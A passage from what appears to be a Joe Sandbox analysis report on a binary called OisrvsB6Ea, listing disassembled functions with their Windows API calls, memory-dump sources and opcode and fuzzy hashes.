                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: DeleteFile$_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 2643169976-0
                                                                                  • Opcode ID: b8dcfa5f080c216e22a4db0a1855f4ddc18b06e8635c76f60c770eb7b2aad1cc
                                                                                  • Instruction ID: 1866b8861499100d7f3ec37caf2821a01279c5342f2f332aa0180b3225fed304
                                                                                  • Opcode Fuzzy Hash: b8dcfa5f080c216e22a4db0a1855f4ddc18b06e8635c76f60c770eb7b2aad1cc
                                                                                  • Instruction Fuzzy Hash: 22E092355502096BDB019F60EC45FEE775CBB09395F488021BD48D2091EB71DEA4DA50
                                                                                  Function 0028AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GdiplusShutdown.GDIPLUS(?,?,?,?,002A2641,000000FF), ref: 0028ACB0
                                                                                  • CoUninitialize.COMBASE(?,?,?,?,002A2641,000000FF), ref: 0028ACB5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: GdiplusShutdownUninitialize
                                                                                  • String ID:
                                                                                  • API String ID: 3856339756-0
                                                                                  • Opcode ID: 6578dd7447f3a06a57ed9fd36e443c4ea367dafdae66284c454c5b98594b254e
                                                                                  • Instruction ID: 582694331ef15fa91d5eaebe6e22407acd0c4d8f3aa870e8dc81de3b42ed5b1b
                                                                                  • Opcode Fuzzy Hash: 6578dd7447f3a06a57ed9fd36e443c4ea367dafdae66284c454c5b98594b254e
                                                                                  • Instruction Fuzzy Hash: 5FE03072544650EBCA00DB58EC06B45FBACFB49B20F044266B416936A0CB74A800CA90
                                                                                  Function 0027A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,0027A23A,?,0027755C,?,?,?,?), ref: 0027A254
                                                                                    • Part of subcall function 0027BB03: _wcslen.LIBCMT ref: 0027BB27
                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0027A23A,?,0027755C,?,?,?,?), ref: 0027A280
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile$_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 2673547680-0
                                                                                  • Opcode ID: 0eb916c406534017fd17da75febb4b69b4c9816ca2eb8909ce7eecec4531ecf0
                                                                                  • Instruction ID: f19af8e42298f2a7ef19d4fd28a3455cf90250c997a0beaa71c776af2c8c6602
                                                                                  • Opcode Fuzzy Hash: 0eb916c406534017fd17da75febb4b69b4c9816ca2eb8909ce7eecec4531ecf0
                                                                                  • Instruction Fuzzy Hash: 98E092365101249BCB11EB64DC09BD97758AB093E2F058261FD48E3191DB70DE54CAA0
                                                                                  Function 0028DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _swprintf.LIBCMT ref: 0028DEEC
                                                                                    • Part of subcall function 00274092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002740A5
                                                                                  • SetDlgItemTextW.USER32(00000065,?), ref: 0028DF03
                                                                                    • Part of subcall function 0028B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0028B579
                                                                                    • Part of subcall function 0028B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0028B58A
                                                                                    • Part of subcall function 0028B568: IsDialogMessageW.USER32(0001047E,?), ref: 0028B59E
                                                                                    • Part of subcall function 0028B568: TranslateMessage.USER32(?), ref: 0028B5AC
                                                                                    • Part of subcall function 0028B568: DispatchMessageW.USER32(?), ref: 0028B5B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 2718869927-0
                                                                                  • Opcode ID: e8ef1cb0784edb7017da9f945583f7e816d0ef3f084c3be9004ed8eab7b92da9
                                                                                  • Instruction ID: 71fde88d1ab053b31b26237433ab147b1be00092734aaef0ca7e2fff88bfbdfe
                                                                                  • Opcode Fuzzy Hash: e8ef1cb0784edb7017da9f945583f7e816d0ef3f084c3be9004ed8eab7b92da9
                                                                                  • Instruction Fuzzy Hash: 8DE09B7581024866DF02B770DC0AFDE37AC5B05785F444851B208D60E3DA78DA208B61
                                                                                  Function 0028081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00280836
                                                                                  • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0027F2D8,Crypt32.dll,00000000,0027F35C,?,?,0027F33E,?,?,?), ref: 00280858
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: DirectoryLibraryLoadSystem
                                                                                  • String ID:
                                                                                  • API String ID: 1175261203-0
                                                                                  • Opcode ID: 8aeb26b538fc2d91bdc9cd001c0b485f70909bb5cf4e12899107ef3ee11cf5cb
                                                                                  • Instruction ID: 888dfeed9f63bd40fe5c371a9d6404ffc704a3445bc6deef89228000c561bf1b
                                                                                  • Opcode Fuzzy Hash: 8aeb26b538fc2d91bdc9cd001c0b485f70909bb5cf4e12899107ef3ee11cf5cb
                                                                                  • Instruction Fuzzy Hash: 20E048768111186BDF11AB94EC49FDB77ACFF0A3D1F040065B649D2044DA74DA94CFB0
                                                                                  Function 0028A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0028A3DA
                                                                                  • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0028A3E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: BitmapCreateFromGdipStream
                                                                                  • String ID:
                                                                                  • API String ID: 1918208029-0
                                                                                  • Opcode ID: f684559215160c84cdd087a407cccafa9639f8314365b09282195f46510f8b5a
                                                                                  • Instruction ID: 04dcf076ced94a0175395a7b0f636ce5a7308ce96a72a843beabc743525153b8
                                                                                  • Opcode Fuzzy Hash: f684559215160c84cdd087a407cccafa9639f8314365b09282195f46510f8b5a
                                                                                  • Instruction Fuzzy Hash: 8AE06D75921208EBDB10EF45C800699BBE8EB05324F10805AA84693240E7B0AE20DB91
                                                                                  Function 00292B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00292BAA
                                                                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00292BB5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                  • String ID:
                                                                                  • API String ID: 1660781231-0
                                                                                  • Opcode ID: 071014766b9d7e34d65cf2d52572824f19ef565ff5154ad29cbc02cf88c29021
                                                                                  • Instruction ID: 4adc883a0d49664f9fa8d6af4e1172c41f17ac3f8e934f2afb13e930ec970d91
                                                                                  • Opcode Fuzzy Hash: 071014766b9d7e34d65cf2d52572824f19ef565ff5154ad29cbc02cf88c29021
                                                                                  • Instruction Fuzzy Hash: A3D02236578302F84C14AE703C3775833C5AD63B7E7A0428FF020854C1EE20847CE821
                                                                                  Function 002712F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemShowWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3351165006-0
                                                                                  • Opcode ID: 914d9b1deab97978c3c40919c1b9d662beb568c028d7ef071495e2c7d0ffec93
                                                                                  • Instruction ID: 30613f0b8f3b71062fdff54c289f9e030a86db54d08021706da7a00f09cd3611
                                                                                  • Opcode Fuzzy Hash: 914d9b1deab97978c3c40919c1b9d662beb568c028d7ef071495e2c7d0ffec93
                                                                                  • Instruction Fuzzy Hash: 0FC0123245C142BECB015BB4EC0DC2B7BA8AB95311F04C909B0A9C0060C238C510DB12
                                                                                  Function 00271A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 71e4cdca814be8783348149d535b7fd7a376514995d8bb7a85faa01bd08378cd
                                                                                  • Instruction ID: 27cce48c6160c7edeef7891fcdb84e81877fd398c132e0364087fcaec2c70df4
                                                                                  • Opcode Fuzzy Hash: 71e4cdca814be8783348149d535b7fd7a376514995d8bb7a85faa01bd08378cd
                                                                                  • Instruction Fuzzy Hash: 62C1D530A202559FEF25CF6CC485BA97BA5EF15314F0881BAEC499B382DB309D74CB61
                                                                                  Function 00273BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 885e79f5ed35fd63d81a6609805037845d17140db550c450ed4cc7ffc80b5df2
                                                                                  • Instruction ID: 6f9b80773873d8a1b73f912fe046a82e090127931c43f6493f98c5265fd87169
                                                                                  • Opcode Fuzzy Hash: 885e79f5ed35fd63d81a6609805037845d17140db550c450ed4cc7ffc80b5df2
                                                                                  • Instruction Fuzzy Hash: 6471CF71121B459ECB25EF74C8519EBB7E9AF14300F40882EE2AF83241DA3266A8DF11
                                                                                  Function 00278284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00278289
                                                                                    • Part of subcall function 002713DC: __EH_prolog.LIBCMT ref: 002713E1
                                                                                    • Part of subcall function 0027A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0027A598
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$CloseFind
                                                                                  • String ID:
                                                                                  • API String ID: 2506663941-0
                                                                                  • Opcode ID: 2dd0800cb80e5ff9b3933b959f6817269fa6d4a2909609c1b3096b79c7794415
                                                                                  • Instruction ID: f31a16a79ec8dd1fb69436a491b8098c10971f654b647e37e846141c250ca54b
                                                                                  • Opcode Fuzzy Hash: 2dd0800cb80e5ff9b3933b959f6817269fa6d4a2909609c1b3096b79c7794415
                                                                                  • Instruction Fuzzy Hash: 4841CB719646559ADB20EB64CC59AE9B378BF00304F4484EBE58EA7083EB745FD4CF50
                                                                                  Function 002713E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 002713E1
                                                                                    • Part of subcall function 00275E37: __EH_prolog.LIBCMT ref: 00275E3C
                                                                                    • Part of subcall function 0027CE40: __EH_prolog.LIBCMT ref: 0027CE45
                                                                                    • Part of subcall function 0027B505: __EH_prolog.LIBCMT ref: 0027B50A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 6ed1693df120896d107d9eaaf923d8ab1086fda995ed14e4b15fe0c315501dec
                                                                                  • Instruction ID: 7fa8cd95cb884cebae06ad12efc5157780216380a0fa5fe46a320819ea00a4d8
                                                                                  • Opcode Fuzzy Hash: 6ed1693df120896d107d9eaaf923d8ab1086fda995ed14e4b15fe0c315501dec
                                                                                  • Instruction Fuzzy Hash: 2C4148B0915B419EE724DF398885AE6FBE5BF19310F50492EE5EE83282CB716664CB10
                                                                                  Function 002713DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 002713E1
                                                                                    • Part of subcall function 00275E37: __EH_prolog.LIBCMT ref: 00275E3C
                                                                                    • Part of subcall function 0027CE40: __EH_prolog.LIBCMT ref: 0027CE45
                                                                                    • Part of subcall function 0027B505: __EH_prolog.LIBCMT ref: 0027B50A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: c93e04e4ac9d08f2d5601d7711777fbc6501df9b1b56710974b2a47e8f44b537
                                                                                  • Instruction ID: 73027261fe779f5c5c5e32de8df93be7135f6db3648da34558e5651aa9577d54
                                                                                  • Opcode Fuzzy Hash: c93e04e4ac9d08f2d5601d7711777fbc6501df9b1b56710974b2a47e8f44b537
                                                                                  • Instruction Fuzzy Hash: 2E4137B0915B419AE724DF798885AE6FBE5BF19300F50492ED5FE83282CB716664CB10
                                                                                  Function 0028359E Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 60932c036cb13bf720f1803461570f5ce1957153b4909913aba0b565c3f300fb
                                                                                  • Instruction ID: 19385680c2cd2bfaefebfe042634d045e8127a7f16c83ab02348b9bfc32597d2
                                                                                  • Opcode Fuzzy Hash: 60932c036cb13bf720f1803461570f5ce1957153b4909913aba0b565c3f300fb
                                                                                  • Instruction Fuzzy Hash: 682139B9E21212ABDF14EF78CC4165A776CFF14714F00013AA505A66C1E7709A20CBA8
                                                                                  Function 0028B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0028B098
                                                                                    • Part of subcall function 002713DC: __EH_prolog.LIBCMT ref: 002713E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: c47b31dce8cd7611c421bb31f478ffd0d069cb144f17e51cd63f8d022295e538
                                                                                  • Instruction ID: b3775d9dd722a58c55fdc59935e58483617c284781afb713eff11ebd05f88d67
                                                                                  • Opcode Fuzzy Hash: c47b31dce8cd7611c421bb31f478ffd0d069cb144f17e51cd63f8d022295e538
                                                                                  • Instruction Fuzzy Hash: D3318D75C21249DBCF15EF68C8519EEB7B4AF09300F10449EE409B7282D735AE24CFA1
                                                                                  Function 0029AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0029ACF8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
